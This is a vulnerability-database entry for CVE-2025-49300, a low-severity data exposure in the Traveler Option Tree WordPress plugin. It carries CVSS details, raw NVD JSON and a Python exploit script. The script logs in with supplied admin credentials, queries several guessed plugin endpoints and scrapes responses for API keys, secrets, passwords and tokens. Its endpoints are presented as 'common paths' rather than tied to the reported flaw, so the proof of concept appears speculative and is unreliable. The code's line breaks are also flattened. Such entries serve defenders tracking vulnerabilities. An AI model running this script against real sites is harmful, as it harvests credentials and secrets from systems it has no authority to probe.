Security Vulnerability Report
中文
CVE-2025-49300 CVSS 2.7 LOW

CVE-2025-49300

Published: 2025-12-16 09:15:52
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in shinetheme Traveler Option Tree custom-option-tree allows Retrieve Embedded Sensitive Data.This issue affects Traveler Option Tree: from n/a through <= 2.8.

CVSS Details

CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Traveler Option Tree (custom-option-tree) <= 2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-49300 PoC - Traveler Option Tree Sensitive Data Exposure # Target: WordPress site with Traveler Option Tree plugin <= 2.8 def exploit_cve_2025_49300(target_url, username, password): """ PoC for CVE-2025-49300: Traveler Option Tree Sensitive Information Exposure This exploits a vulnerability where sensitive data is exposed through the custom-option-tree component without proper access control. Note: Requires high privilege account (admin/editor role) """ session = requests.Session() # Step 1: Login to WordPress with high privilege account login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print(f"[*] Attempting login to {target_url}") response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return None print("[+] Login successful") # Step 2: Access the vulnerable endpoint to retrieve sensitive data # Common paths for Traveler Option Tree vulnerable_endpoints = [ '/wp-admin/admin-ajax.php?action=ot_get_option_tree', '/wp-content/plugins/custom-option-tree/includes/ot-functions.php', '/wp-admin/admin.php?page=ot-settings', ] sensitive_data = [] for endpoint in vulnerable_endpoints: url = target_url + endpoint print(f"[*] Querying endpoint: {url}") try: response = session.get(url, timeout=10) if response.status_code == 200: # Check for sensitive patterns in response if any(pattern in response.text for pattern in ['api_key', 'secret', 'password', 'token', 'credential']): print(f"[+] Potential sensitive data found at {endpoint}") sensitive_data.append({ 'endpoint': endpoint, 'data': response.text[:1000] # First 1000 chars }) except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") if sensitive_data: print(f"\n[!] Found {len(sensitive_data)} potential sensitive data exposures") return sensitive_data else: print("[-] No sensitive data found (target may be patched or not vulnerable)") return None if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://example.com admin password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_49300(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49300", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:52.120", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in shinetheme Traveler Option Tree custom-option-tree allows Retrieve Embedded Sensitive Data.This issue affects Traveler Option Tree: from n/a through <= 2.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/custom-option-tree/vulnerability/wordpress-traveler-option-tree-plugin-2-8-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}